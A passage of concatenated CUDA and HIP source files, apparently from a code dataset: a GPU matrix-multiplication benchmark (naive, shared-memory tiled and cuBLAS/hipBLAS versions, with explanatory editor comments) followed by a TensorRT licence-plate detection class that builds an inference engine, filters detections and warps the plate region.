TILE_SIZE); exit(1); } break; case 'v': verify = true; printf("Matrix size: %ldx%ld\n", size, size); break; default: print_usage(argv[0]); exit(1); } } grid = dim3(((size + (TILE_SIZE - 1)) / TILE_SIZE), ((size + (TILE_SIZE - 1)) / TILE_SIZE)); printf("Matrix size: %ldx%ld\n", size, size); printf("Grid size: %ux%u\n", grid.x, grid.y); printf("Tile size: %ux%u\n", TILE_SIZE, TILE_SIZE); printf("Run CPU sgemm: %d\n\n", verify); float *A = (float*)malloc(sizeof(float)*size*size); float *B = (float*)malloc(sizeof(float)*size*size); float *C_result = (float*)malloc(sizeof(float)*size*size); float *C_truth = (float*)malloc(sizeof(float)*size*size); float *d_A = NULL; float *d_B = NULL; float *d_C = NULL; if (A == NULL || B == NULL || C_truth == NULL || C_result == NULL) { fprintf(stderr, "Error: %s\n", strerror(errno)); exit(1); } /* initialize A and B */ init_matrix(A, size, 1); init_matrix(B, size, 5); memset(C_truth, 0, sizeof(float)*size*size); /* allocate A and B on GPU */ checkCudaErrors(hipMalloc(&d_A, sizeof(float)*size*size)); checkCudaErrors(hipMalloc(&d_B, sizeof(float)*size*size)); checkCudaErrors(hipMalloc(&d_C, sizeof(float)*size*size)); /* copy A and B to GPU */ 
checkCudaErrors(hipMemcpy(d_A, A, sizeof(float)*size*size, hipMemcpyHostToDevice)); checkCudaErrors(hipMemcpy(d_B, B, sizeof(float)*size*size, hipMemcpyHostToDevice)); /* host gemm */ if (verify) { cpu_sgemm(C_truth, A, B, size); } /* set C on GPU and run cublas */ checkCudaErrors(hipMemset(d_C, 0, sizeof(float)*size*size)); //printf("ASDASDASD\n"); cublas_sgemm(d_C, d_A, d_B, size); //printf("NNGNGNGNGNGN"); if (verify) { checkCudaErrors(hipMemcpy(C_result, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); } else { checkCudaErrors(hipMemcpy(C_truth, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); } /* run naive gpu gemm */ checkCudaErrors(hipMemset(d_C, 0, sizeof(float)*size*size)); naive_sgemm(d_C, d_A, d_B, size); checkCudaErrors(hipMemcpy(C_result, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* run shared */ checkCudaErrors(hipMemset(d_C, 0, sizeof(float)*size*size)); shared_sgemm(d_C, d_A, d_B, size); checkCudaErrors(hipMemcpy(C_result, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* free */ checkCudaErrors(hipFree(d_A)); checkCudaErrors(hipFree(d_B)); checkCudaErrors(hipFree(d_C)); free(A); free(B); free(C_truth); free(C_result); return 0; }
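/* Editor's note on the hipified listing above (hedged): the translation keeps
 * hipBLAS calls (hipblasCreate / hipblasSgemm / hipblasDestroy) but includes
 * <rocblas.h>, which declares the rocblas_* API rather than the hipblas*
 * symbols, so the file as generated is unlikely to compile as-is. A corrected
 * preamble and the matching call are sketched below; the exact header spelling
 * (<hipblas.h> vs <hipblas/hipblas.h>) depends on the ROCm release, and the
 * function name hipblas_sgemm_sketch is illustrative only. */
#include <hip/hip_runtime.h>
#include <hipblas.h>   /* replaces <rocblas.h> when the hipblas* API is used */

/* Same operation as cublas_sgemm() in the listing: column-major C = B * A,
 * which yields the row-major C = A * B that the rest of the program expects. */
static void hipblas_sgemm_sketch(float *d_C, float *d_A, float *d_B, long size) {
  const int n = static_cast<int>(size);
  const float alpha = 1.0f, beta = 0.0f;
  hipblasHandle_t handle;
  hipblasCreate(&handle);
  hipblasSgemm(handle, HIPBLAS_OP_N, HIPBLAS_OP_N,
               n, n, n,
               &alpha, d_B, n, d_A, n,
               &beta, d_C, n);
  hipDeviceSynchronize();   /* the GEMM is asynchronous with respect to the host */
  hipblasDestroy(handle);
}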
e5fbec3f0e75d0718662e41e7bb4a83a3261d40c.cu
#include <cuda.h> #include <stdio.h> #include <curand.h> #include <sys/time.h> #include <errno.h> #include <unistd.h> #include <cublas_v2.h> #include <iostream> #include <unistd.h> #ifndef TILE_SIZE #define TILE_SIZE 16 #endif #define THRESHOLD 1e-3 /* CUDA layout */ dim3 grid(1); dim3 block(TILE_SIZE, TILE_SIZE); /* from cuda samples */ void checkGpuError(cudaError_t result, char const *const func, const char *const file, int const line) { if(result!=cudaSuccess) { \ fprintf(stderr, "Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,cudaGetErrorString(result)); exit(1); } } // This will output the proper CUDA error strings in the event // that a CUDA host call returns an error #define checkCudaErrors(val) checkGpuError((val), #val, __FILE__, __LINE__) /* https://gist.github.com/Tener/803377 */ #define CURAND_CALL(x) { \ do { \ if((x) != CURAND_STATUS_SUCCESS) { \ printf("Error at %s:%d\n",__FILE__,__LINE__); \ exit(1); \ } \ } while(0); \ } /* time diff in ms */ double elapsed(struct timeval t0, struct timeval t1) { return (double)(t1.tv_sec - t0.tv_sec) * 1000.0L + (double)(t1.tv_usec - t0.tv_usec) / 1000.0L; } /* compare matrix with abs difference */ void compare_matrix(float *matrix_a, float *matrix_b, long size, double threshold) { for (long i = 0; i < size*size; i++) { if (fabs((double)matrix_a[i] - (double)matrix_b[i]) > threshold) { fprintf(stderr, "Compare matrix failed: %f vs %f at i = %ld\n", matrix_a[i], matrix_b[i], i); exit(1); } } printf("Matrices equivalent \n"); } /* init matrix with curand */ void init_matrix(float *matrix, long size, unsigned long long seed) { float *d_matrix = NULL; curandGenerator_t gen; checkCudaErrors(cudaMalloc(&d_matrix, sizeof(float)*size*size)); CURAND_CALL(curandCreateGenerator(&gen, CURAND_RNG_PSEUDO_DEFAULT)); CURAND_CALL(curandSetPseudoRandomGeneratorSeed(gen, seed)); CURAND_CALL(curandGenerateUniform(gen, d_matrix, size*size)); checkCudaErrors(cudaMemcpy(matrix, d_matrix, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); checkCudaErrors(cudaFree(d_matrix)); CURAND_CALL(curandDestroyGenerator(gen)); } /* C = AB on CPU with re-ordered loop */ void cpu_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); for (long i = 0; i < size; i++) { for (long k = 0; k < size; k++) { for (long j = 0; j < size; j++) { C[i * size + j] += A[i * size + k] * B[k * size + j]; } } } gettimeofday(&t1, NULL); printf("CPU matmul:\t\t\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with global memory */ __global__ void naive_sgemm_kernel(float *C, float *A, float *B, long size) { const long i = blockIdx.x * blockDim.x + threadIdx.x; const long j = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; if (i >= size || j >= size) return; for (long k = 0; k < size; k++) { val += A[i * size + k] * B[k * size + j]; } C[i * size + j] += val; } /* matmul with global memory */ void naive_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); naive_sgemm_kernel<<<grid, block>>>(C, A, B, size); checkCudaErrors(cudaPeekAtLastError()); checkCudaErrors(cudaDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (global memory):\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with shared memory */ __global__ void shared_sgemm_kernel(float *C, float *A, float *B, long size) { const long col = blockIdx.x * blockDim.x + threadIdx.x; const long row = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; /* TODO declare shared memory with size TILE_SIZE x TILE_SIZE */ __shared__ float 
tile_A[TILE_SIZE][TILE_SIZE]; __shared__ float tile_B[TILE_SIZE][TILE_SIZE]; if (col < size && row < size) { const long local_col = blockIdx.x * TILE_SIZE + threadIdx.x; const long local_row = blockIdx.y * TILE_SIZE + threadIdx.y; for (long m = 0; m < size / TILE_SIZE; ++m) { tile_A[threadIdx.y][threadIdx.x] = A[local_row * size + (m * TILE_SIZE + threadIdx.x)]; tile_B[threadIdx.y][threadIdx.x] = B[(m * TILE_SIZE + threadIdx.y) * size + local_col]; __syncthreads(); /* TODO introduce a pragma directive that can potentially improve performance here */ #pragma unroll for (long k = 0; k < TILE_SIZE; ++k) { val += tile_A[threadIdx.y][k] * tile_B[k][threadIdx.x]; /* TODO Perform multiplication here */ } __syncthreads(); } C[local_row * size + local_col] += val; } } /* matmul with shared memory */ void shared_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); shared_sgemm_kernel<<<grid, block>>>(C, A, B, size); checkCudaErrors(cudaPeekAtLastError()); checkCudaErrors(cudaDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (shared memory):\t%f ms\n", elapsed(t0, t1)); } /* cuBLAS */ void cublas_sgemm(float *C, float *A, float *B, long size) { //printf("Inside cublas \n"); struct timeval t0, t1; float alpha = 1.0; float beta = 0.0; //printf("dddasdasd\n"); cublasHandle_t handle; cublasCreate(&handle); //cublasSetPointerMode(handle, CUBLAS_POINTER_MODE_DEVICE); //printf("made it furtherrrr\n"); gettimeofday(&t0, NULL); /* TODO fill in the blanks, do C = BA instead of C = AB */ cublasSgemm(handle, CUBLAS_OP_N, CUBLAS_OP_N, size, size, size, &alpha,B,size,A,size,&beta,C,size); checkCudaErrors(cudaDeviceSynchronize()); gettimeofday(&t1, NULL); cublasDestroy(handle); printf("GPU cuBLAS matmul:\t\t%f ms\n", elapsed(t0, t1)); } void print_usage(char *program) { fprintf(stderr, "Usage: %s [-s size] [-v to verify with CPU sgemm]\n", program); } int main(int argc, char *argv[]) { int opt; long size = 64*2*2*2*2*2; bool verify = false; while ((opt = getopt(argc, argv, "s:v")) != -1) { switch (opt) { case 's': size = atol(optarg); if (size % TILE_SIZE != 0) { fprintf(stderr, "Error: Matrix size must be a multiple of tile size %d.\n", TILE_SIZE); exit(1); } break; case 'v': verify = true; printf("Matrix size: %ldx%ld\n", size, size); break; default: print_usage(argv[0]); exit(1); } } grid = dim3(((size + (TILE_SIZE - 1)) / TILE_SIZE), ((size + (TILE_SIZE - 1)) / TILE_SIZE)); printf("Matrix size: %ldx%ld\n", size, size); printf("Grid size: %ux%u\n", grid.x, grid.y); printf("Tile size: %ux%u\n", TILE_SIZE, TILE_SIZE); printf("Run CPU sgemm: %d\n\n", verify); float *A = (float*)malloc(sizeof(float)*size*size); float *B = (float*)malloc(sizeof(float)*size*size); float *C_result = (float*)malloc(sizeof(float)*size*size); float *C_truth = (float*)malloc(sizeof(float)*size*size); float *d_A = NULL; float *d_B = NULL; float *d_C = NULL; if (A == NULL || B == NULL || C_truth == NULL || C_result == NULL) { fprintf(stderr, "Error: %s\n", strerror(errno)); exit(1); } /* initialize A and B */ init_matrix(A, size, 1); init_matrix(B, size, 5); memset(C_truth, 0, sizeof(float)*size*size); /* allocate A and B on GPU */ checkCudaErrors(cudaMalloc(&d_A, sizeof(float)*size*size)); checkCudaErrors(cudaMalloc(&d_B, sizeof(float)*size*size)); checkCudaErrors(cudaMalloc(&d_C, sizeof(float)*size*size)); /* copy A and B to GPU */ checkCudaErrors(cudaMemcpy(d_A, A, sizeof(float)*size*size, cudaMemcpyHostToDevice)); checkCudaErrors(cudaMemcpy(d_B, B, sizeof(float)*size*size, 
cudaMemcpyHostToDevice)); /* host gemm */ if (verify) { cpu_sgemm(C_truth, A, B, size); } /* set C on GPU and run cublas */ checkCudaErrors(cudaMemset(d_C, 0, sizeof(float)*size*size)); //printf("ASDASDASD\n"); cublas_sgemm(d_C, d_A, d_B, size); //printf("NNGNGNGNGNGN"); if (verify) { checkCudaErrors(cudaMemcpy(C_result, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); } else { checkCudaErrors(cudaMemcpy(C_truth, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); } /* run naive gpu gemm */ checkCudaErrors(cudaMemset(d_C, 0, sizeof(float)*size*size)); naive_sgemm(d_C, d_A, d_B, size); checkCudaErrors(cudaMemcpy(C_result, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* run shared */ checkCudaErrors(cudaMemset(d_C, 0, sizeof(float)*size*size)); shared_sgemm(d_C, d_A, d_B, size); checkCudaErrors(cudaMemcpy(C_result, d_C, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* free */ checkCudaErrors(cudaFree(d_A)); checkCudaErrors(cudaFree(d_B)); checkCudaErrors(cudaFree(d_C)); free(A); free(B); free(C_truth); free(C_result); return 0; }
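/* Editor's note (hedged): why cublas_sgemm() above requests C = B * A rather
 * than C = A * B. The host arrays are row-major while cuBLAS assumes
 * column-major, and a row-major matrix reinterpreted as column-major is its
 * transpose. Requesting
 *     C_cm = B_cm * A_cm
 * therefore computes, in row-major terms,
 *     C^T = B^T * A^T = (A * B)^T   =>   C = A * B,
 * which matches what cpu_sgemm() produces. Spelled out as a standalone sketch
 * (the function name cublas_sgemm_rowmajor_sketch is illustrative only): */
#include <cublas_v2.h>

static void cublas_sgemm_rowmajor_sketch(float *d_C, float *d_A, float *d_B, long size) {
  const int n = static_cast<int>(size);
  const float alpha = 1.0f, beta = 0.0f;
  cublasHandle_t handle;
  cublasCreate(&handle);
  cublasSgemm(handle, CUBLAS_OP_N, CUBLAS_OP_N,
              /*m=*/n, /*n=*/n, /*k=*/n,
              &alpha,
              d_B, /*lda=*/n,   /* "left" operand:  row-major B, seen by cuBLAS as B^T */
              d_A, /*ldb=*/n,   /* "right" operand: row-major A, seen by cuBLAS as A^T */
              &beta,
              d_C, /*ldc=*/n);  /* result is C^T in column-major == C in row-major */
  cublasDestroy(handle);
}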
cb5c290f63dfd4c8cff0d10a7512bbd298f2c9e9.hip
// !!! This is a file automatically generated by hipify!!! #include <chrono> #include <iostream> #include <fstream> #include <memory> #include <cstdlib> #include <vector> #include <algorithm> #include <hip/hip_runtime_api.h> #include <opencv2/opencv.hpp> #include <opencv2/imgproc.hpp> #include <opencv2/highgui.hpp> #include <opencv2/core/cuda.hpp> #include <opencv2/cudawarping.hpp> #include <opencv2/cudaarithm.hpp> #include "NvInfer.h" #include "NvUffParser.h" #include "alpr_api.cc" #include "buffer.cu" using Severity = nvinfer1::ILogger::Severity; class Logger : public nvinfer1::ILogger { void log(Severity severity, const char* msg) override { if((severity == Severity::kERROR) || (severity == Severity::kINTERNAL_ERROR)) std::cout << msg << std::endl; } } gLogger; struct TRTDestroy { template<typename T> void operator()(T* object) const { if(object) object->destroy(); } }; template<typename T> using unique_ptr = std::unique_ptr<T, TRTDestroy>; namespace alpr { class Detection { private: std::shared_ptr<nvinfer1::ICudaEngine> engine; unique_ptr<nvinfer1::IExecutionContext> context; detection::Params params; bool build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser ); bool preprocessing(cv::Mat image, BufferManager &buffer, const nvinfer1::Dims& dims); std::vector<alpr::detection::Label> filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size); cv::Mat extract_plate(cv::Mat image, cv::Mat points, cv::Size size); public: Detection(detection::Params params); bool build(); bool infer(cv::Mat &image, float threshold, std::pair<detection::Label, cv::Mat>* output); }; }; alpr::Detection::Detection(alpr::detection::Params params) { this->params = params; }; struct InferDeleter { template <typename T> void operator()(T* obj) const { if (obj) { obj->destroy(); } } }; bool alpr::Detection::build(){ { std::vector<char> trtModelStream; size_t size{0}; std::ifstream file("detection.engine", std::ios::binary); if (file.good()) { file.seekg(0, file.end); size = file.tellg(); file.seekg(0, file.beg); trtModelStream.resize(size); file.read(trtModelStream.data(), size); file.close(); } nvinfer1::IRuntime* infer = nvinfer1::createInferRuntime(gLogger); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>( infer->deserializeCudaEngine(trtModelStream.data(), size, nullptr), InferDeleter()); if(this->engine) { this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; } } auto builder = unique_ptr<nvinfer1::IBuilder>(nvinfer1::createInferBuilder(gLogger)); if(!builder) { std::cerr << "[Detection] Could not create a builder" << std::endl; return false; } auto network = unique_ptr<nvinfer1::INetworkDefinition>(builder->createNetwork()); if(!network) { std::cerr << "[Detection] Could not create a network" << std::endl; return false; } auto config = unique_ptr<nvinfer1::IBuilderConfig>(builder->createBuilderConfig()); if(!config) { std::cerr << "[Detection] Could not create a builder config" << std::endl; return false; } auto parser = unique_ptr<nvuffparser::IUffParser>(nvuffparser::createUffParser()); if(!parser) { std::cerr << "[Detection] Could not create a uff parser" << std::endl; return false; } config->setFlag(nvinfer1::BuilderFlag::kFP16); return 
this->build_engine(builder, network, config, parser); }; bool alpr::Detection::build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser) { parser->registerInput(this->params.input_tensor.c_str(), nvinfer1::DimsCHW(3, 512, 912), nvuffparser::UffInputOrder::kNCHW); parser->registerOutput(this->params.output_tensor.c_str()); auto is_parsed = parser->parse(this->params.path_to_model.c_str(), *network, nvinfer1::DataType::kFLOAT); if(!is_parsed) { std::cerr << "[Detection] Could not parse '" << this->params.path_to_model.c_str() << "' model" << std::endl; return false; } builder->setMaxBatchSize(this->params.batch_size); config->setMaxWorkspaceSize(1 << 30); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>(builder->buildEngineWithConfig(*network, *config), TRTDestroy()); if(!this->engine) { std::cerr << "[Detection] Could not build engine" << std::endl; return false; } std::ofstream __file("detection.engine", std::ios::binary); if(!__file) return false; nvinfer1::IHostMemory* memory = this->engine->serialize(); assert(memory); __file.write(reinterpret_cast<const char*>(memory->data()), memory->size()); memory->destroy(); __file.close(); std::cout << "Engine has restored" << std::endl; this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; }; bool alpr::Detection::preprocessing(cv::Mat image, BufferManager &buffers, const nvinfer1::Dims& dims) { cv::resize(image, image, cv::Size(dims.d[2], dims.d[1]), cv::INTER_CUBIC); float* buffer = static_cast<float*>(buffers.getHostBuffer(this->params.input_tensor)); for(int i = 0, volume_image = dims.d[0] * dims.d[1] * dims.d[2]; i < this->params.batch_size; ++i) { for (unsigned j = 0, volume_c = dims.d[1] * dims.d[2]; j < volume_c; ++j) { buffer[i * volume_image + 0 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 0]) / 255.0; buffer[i * volume_image + 1 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 1]) / 255.0; buffer[i * volume_image + 2 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 2]) / 255.0; } } return true; } bool alpr::Detection::infer(cv::Mat &image, float threshold, std::pair<alpr::detection::Label, cv::Mat>* output) { BufferManager buffers(this->engine, this->params.batch_size); std::vector<nvinfer1::Dims> input_dims; std::vector<nvinfer1::Dims> output_dims; for (size_t i = 0; i < this->engine->getNbBindings(); ++i) { if(engine->bindingIsInput(i)) input_dims.emplace_back(engine->getBindingDimensions(i)); else output_dims.emplace_back(engine->getBindingDimensions(i)); } if (input_dims.empty() || output_dims.empty()) { std::cerr << "[Detection] Expect at least one input and one output for network" << std::endl; return false; } if(!this->preprocessing(image, buffers, input_dims[0])) { return false; } buffers.copyInputToDevice(); bool status = this->context->enqueue(this->params.batch_size, buffers.getDeviceBindings().data(), 0, nullptr); if(!status) { std::cout << "Model is not infered successfully" << std::endl; } buffers.copyOutputToHost(); float* output_buffer = static_cast<float*>(buffers.getHostBuffer(this->params.output_tensor)); std::vector<alpr::detection::Label> labels = this->filter_detection(cv::Size(input_dims[0].d[2], input_dims[0].d[1]), output_buffer, output_dims[0], threshold, this->params.batch_size); 
std::vector<alpr::detection::Label> selections = alpr::nms(labels, threshold); if(selections.size() == 0) return false; alpr::detection::Label result = selections.at(0); cv::Size size = image.size(); result.points.row(0) *= size.height; result.points.row(1) *= size.width; output->first = result; output->second = this->extract_plate(image, result.points.clone(), cv::Size(240, 80)); return true; }; std::vector<alpr::detection::Label> alpr::Detection::filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size) { float side = 7.75; std::vector<float> cpu_output(output_buffer, output_buffer + alpr::get_size_by_dim(dims) * batch_size); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << -0.5, 0.5, 0.5, -0.5, -0.5, -0.5, 0.5, 0.5, 1.0, 1.0, 1.0, 1.0); std::vector<alpr::detection::Label> labels; size_t index = 0; for(size_t batch = 1; batch <= batch_size; batch++) { for(size_t x = 0; x < dims.d[0]; x++) { for(size_t y = 0; y < dims.d[1]; y++) { float prob = cpu_output.at(index); float data[2][3] = { {cpu_output.at(index + 2), cpu_output.at(index + 3), cpu_output.at(index + 4)}, {cpu_output.at(index + 5), cpu_output.at(index + 6), cpu_output.at(index + 7)} }; index += 8; if(prob <= threshold) continue; cv::Mat affine = cv::Mat(2, 3, CV_32F, data); affine.at<float>(0, 0) = max(affine.at<float>(0, 0), 0.0); affine.at<float>(1, 1) = max(affine.at<float>(1, 1), 0.0); cv::Mat points = affine * transpose_matrix * side; points.row(0) += float(y) + 0.5; points.row(1) += float(x) + 0.5; points.row(0) /= 1.0 * size.height / ::pow(2.0, 4); points.row(1) /= 1.0 * size.width / ::pow(2.0, 4); alpr::detection::Label label(points, prob); labels.push_back(label); } } } std::sort(labels.begin(), labels.end(), [](alpr::detection::Label label_1, alpr::detection::Label label_2) -> bool { return label_1.prob > label_2.prob; }); return labels; }; cv::Mat alpr::Detection::extract_plate(cv::Mat image, cv::Mat points, cv::Size output_size) { cv::Mat matrix; cv::vconcat(points, cv::Mat::ones(1, 4, points.type()), matrix); cv::Mat transpose_matrix = (cv::Mat_<float>(3, 4) << 0.0, output_size.width, output_size.width, 0.0, 0.0, 0.0, output_size.height, output_size.height, 1.0, 1.0, 1.0, 1.0 ); cv::Mat affine = cv::Mat::zeros(8, 9, points.type()); for(size_t i = 0; i < 4; i++) { cv::Mat x = matrix.col(i).t(); cv::Mat transpose = transpose_matrix.col(i); cv::Mat v1 = -1.0 * transpose.at<float>(2) * x; cv::Mat v2 = transpose.at<float>(1) * x; cv::Mat v3 = transpose.at<float>(2) * x; cv::Mat v4 = -1.0 * transpose.at<float>(0) * x; cv::Mat corr_row = (cv::Mat_<float>(1, 9) << 0.0, 0.0, 0.0, v1.at<float>(0), v1.at<float>(1), v1.at<float>(2), v2.at<float>(0), v2.at<float>(1), v2.at<float>(2) ); cv::Mat next_row = (cv::Mat_<float>(1, 9) << v3.at<float>(0), v3.at<float>(1), v3.at<float>(2), 0.0, 0.0, 0.0, v4.at<float>(0), v4.at<float>(1), v4.at<float>(2) ); affine.row(i * 2) += corr_row; affine.row(i * 2 + 1) += next_row; } cv::SVD svd = cv::SVD(affine, 4); cv::Mat transform; svd.vt.row(svd.vt.size().height - 1).reshape(0, 3).assignTo(transform, CV_64F); cv::Mat plate; cv::warpPerspective(image, plate, transform, output_size, 1, 0.0); cv::cvtColor(plate, plate, cv::COLOR_BGR2GRAY); cv::cvtColor(plate, plate, cv::COLOR_GRAY2BGR); return plate; }
cb5c290f63dfd4c8cff0d10a7512bbd298f2c9e9.cu
#include <chrono> #include <iostream> #include <fstream> #include <memory> #include <cstdlib> #include <vector> #include <algorithm> #include <cuda_runtime_api.h> #include <opencv2/opencv.hpp> #include <opencv2/imgproc.hpp> #include <opencv2/highgui.hpp> #include <opencv2/core/cuda.hpp> #include <opencv2/cudawarping.hpp> #include <opencv2/cudaarithm.hpp> #include "NvInfer.h" #include "NvUffParser.h" #include "alpr_api.cc" #include "buffer.cu" using Severity = nvinfer1::ILogger::Severity; class Logger : public nvinfer1::ILogger { void log(Severity severity, const char* msg) override { if((severity == Severity::kERROR) || (severity == Severity::kINTERNAL_ERROR)) std::cout << msg << std::endl; } } gLogger; struct TRTDestroy { template<typename T> void operator()(T* object) const { if(object) object->destroy(); } }; template<typename T> using unique_ptr = std::unique_ptr<T, TRTDestroy>; namespace alpr { class Detection { private: std::shared_ptr<nvinfer1::ICudaEngine> engine; unique_ptr<nvinfer1::IExecutionContext> context; detection::Params params; bool build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser ); bool preprocessing(cv::Mat image, BufferManager &buffer, const nvinfer1::Dims& dims); std::vector<alpr::detection::Label> filter_detection(cv::Size size, float* output_buffer, const nvinfer1::Dims& dims, float threshold, const int batch_size); cv::Mat extract_plate(cv::Mat image, cv::Mat points, cv::Size size); public: Detection(detection::Params params); bool build(); bool infer(cv::Mat &image, float threshold, std::pair<detection::Label, cv::Mat>* output); }; }; alpr::Detection::Detection(alpr::detection::Params params) { this->params = params; }; struct InferDeleter { template <typename T> void operator()(T* obj) const { if (obj) { obj->destroy(); } } }; bool alpr::Detection::build(){ { std::vector<char> trtModelStream; size_t size{0}; std::ifstream file("detection.engine", std::ios::binary); if (file.good()) { file.seekg(0, file.end); size = file.tellg(); file.seekg(0, file.beg); trtModelStream.resize(size); file.read(trtModelStream.data(), size); file.close(); } nvinfer1::IRuntime* infer = nvinfer1::createInferRuntime(gLogger); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>( infer->deserializeCudaEngine(trtModelStream.data(), size, nullptr), InferDeleter()); if(this->engine) { this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; } } auto builder = unique_ptr<nvinfer1::IBuilder>(nvinfer1::createInferBuilder(gLogger)); if(!builder) { std::cerr << "[Detection] Could not create a builder" << std::endl; return false; } auto network = unique_ptr<nvinfer1::INetworkDefinition>(builder->createNetwork()); if(!network) { std::cerr << "[Detection] Could not create a network" << std::endl; return false; } auto config = unique_ptr<nvinfer1::IBuilderConfig>(builder->createBuilderConfig()); if(!config) { std::cerr << "[Detection] Could not create a builder config" << std::endl; return false; } auto parser = unique_ptr<nvuffparser::IUffParser>(nvuffparser::createUffParser()); if(!parser) { std::cerr << "[Detection] Could not create a uff parser" << std::endl; return false; } config->setFlag(nvinfer1::BuilderFlag::kFP16); return this->build_engine(builder, network, config, parser); }; bool 
alpr::Detection::build_engine( unique_ptr<nvinfer1::IBuilder>& builder, unique_ptr<nvinfer1::INetworkDefinition>& network, unique_ptr<nvinfer1::IBuilderConfig>& config, unique_ptr<nvuffparser::IUffParser>& parser) { parser->registerInput(this->params.input_tensor.c_str(), nvinfer1::DimsCHW(3, 512, 912), nvuffparser::UffInputOrder::kNCHW); parser->registerOutput(this->params.output_tensor.c_str()); auto is_parsed = parser->parse(this->params.path_to_model.c_str(), *network, nvinfer1::DataType::kFLOAT); if(!is_parsed) { std::cerr << "[Detection] Could not parse '" << this->params.path_to_model.c_str() << "' model" << std::endl; return false; } builder->setMaxBatchSize(this->params.batch_size); config->setMaxWorkspaceSize(1 << 30); this->engine = std::shared_ptr<nvinfer1::ICudaEngine>(builder->buildEngineWithConfig(*network, *config), TRTDestroy()); if(!this->engine) { std::cerr << "[Detection] Could not build engine" << std::endl; return false; } std::ofstream __file("detection.engine", std::ios::binary); if(!__file) return false; nvinfer1::IHostMemory* memory = this->engine->serialize(); assert(memory); __file.write(reinterpret_cast<const char*>(memory->data()), memory->size()); memory->destroy(); __file.close(); std::cout << "Engine has restored" << std::endl; this->context = unique_ptr<nvinfer1::IExecutionContext>(this->engine->createExecutionContext()); if(!this->context) { std::cerr << "[Detection] Could not create engine context" << std::endl; return false; } return true; }; bool alpr::Detection::preprocessing(cv::Mat image, BufferManager &buffers, const nvinfer1::Dims& dims) { cv::resize(image, image, cv::Size(dims.d[2], dims.d[1]), cv::INTER_CUBIC); float* buffer = static_cast<float*>(buffers.getHostBuffer(this->params.input_tensor)); for(int i = 0, volume_image = dims.d[0] * dims.d[1] * dims.d[2]; i < this->params.batch_size; ++i) { for (unsigned j = 0, volume_c = dims.d[1] * dims.d[2]; j < volume_c; ++j) { buffer[i * volume_image + 0 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 0]) / 255.0; buffer[i * volume_image + 1 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 1]) / 255.0; buffer[i * volume_image + 2 * volume_c + j] = float(image.data[j * dims.d[0] + 2 - 2]) / 255.0; } } return true; } bool alpr::Detection::infer(cv::Mat &image, float threshold, std::pair<alpr::detection::Label, cv::Mat>* output) { BufferManager buffers(this->engine, this->params.batch_size); std::vector<nvinfer1::Dims> input_dims; std::vector<nvinfer1::Dims> output_dims; for (size_t i = 0; i < this->engine->getNbBindings(); ++i) { if(engine->bindingIsInput(i)) input_dims.emplace_back(engine->getBindingDimensions(i)); else output_dims.emplace_back(engine->getBindingDimensions(i)); } if (input_dims.empty() || output_dims.empty()) { std::cerr << "[Detection] Expect at least one input and one output for network" << std::endl; return false; } if(!this->preprocessing(image, buffers, input_dims[0])) { return false; } buffers.copyInputToDevice(); bool status = this->context->enqueue(this->params.batch_size, buffers.getDeviceBindings().data(), 0, nullptr); if(!status) { std::cout << "Model is not infered successfully" << std::endl; } buffers.copyOutputToHost(); float* output_buffer = static_cast<float*>(buffers.getHostBuffer(this->params.output_tensor)); std::vector<alpr::detection::Label> labels = this->filter_detection(cv::Size(input_dims[0].d[2], input_dims[0].d[1]), output_buffer, output_dims[0], threshold, this->params.batch_size); std::vector<alpr::detection::Label> 